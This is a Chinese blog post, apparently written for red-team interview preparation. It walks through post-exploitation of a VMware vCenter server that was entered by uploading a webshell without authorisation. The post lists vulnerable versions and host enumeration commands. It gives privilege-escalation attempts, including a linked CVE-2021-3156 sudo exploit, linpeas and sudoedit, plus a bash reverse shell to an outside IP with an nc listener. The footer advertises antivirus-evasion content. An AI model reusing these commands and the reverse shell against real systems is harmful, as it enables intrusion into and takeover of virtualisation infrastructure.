【护网必问】Vcenter后渗透漏洞应用！

点击蓝字，立即关注

前言：通过未授权前台上传shell成功拿到webshell，这几天面试题问的多，就先尝试一下Vcenter后渗透

漏洞版本->6.71

https://10.128.23.123/sdk/vimServiceVersions.xml

VMware vCenter Server 7.0系列< 7.0.U1cVMware vCenter Server 6.7系列< 6.7.U3lVMware vCenter Server 6.5系列< 6.5 U3n

研判容器

cat /proc/1/cgroup

通常需要检查/proc/1/cgroup文件中的内容。在容器中，通常会有类似于$1:name=systemd:/docker/$container_id的行，其中$container_id是容器的唯一标识符。

这里我们判断是非容器了且执行权限不是root，权限一般般

su

chmod +x /etc/sudoers

提权

cat /etc/*-release

VMware Photon.....第一次听这个操作系统，以为是容器但是前面判断并没有什么container-id，于是去问gpt。

用了一个提权脚本，以失败告终

https://github.com/worawit/CVE-2021-3156/blob/main/exploit_defaults_mailer.py

看看有哪些管理员账户吧

cat /etc/passwd

可以发现uid为0的只有root账户

遍历域账户

/usr/lib/vmware-vmafd/bin/vmafd-cli get-domain-name --server-name localhost

重置域账户密码，失败了，很好，还是权限的问题。

/usr/lib/vmware-vmdir/bin/vdcadmintooladministrator@vsphere.local

先反弹到我主机上来

nc -lvvp 1555bash -i >& /dev/tcp/10.23.108.79/1555 0>&1

linpeas提权

直接在我windows上启动msf，正向shell试试看。

uname -a

lscpu

确定是虚拟机搭建

./linpeas.sh

这里列举了一堆可以进行提权的历史漏洞

进一步证明为vmware

sudo -V

sudo版本是1.8.20p2，存在sudo提权漏洞CVE-2021-3156

sudoedit -s /

上传相关提权脚本后编译，直接告诉我无make指令，下载又需要sudo权限...泪目了，后续通过上传编译脚本直接拿下

往期回顾

【独家揭秘】某EDU！Docker容器逃逸大揭秘！你的数据安全有多脆弱？

【大招来袭】超强浏览器插件，助你绕过微信授权登录限制！

过火绒、腾讯管家、defender免杀思路分享

点分享

点收藏

点在看

点点赞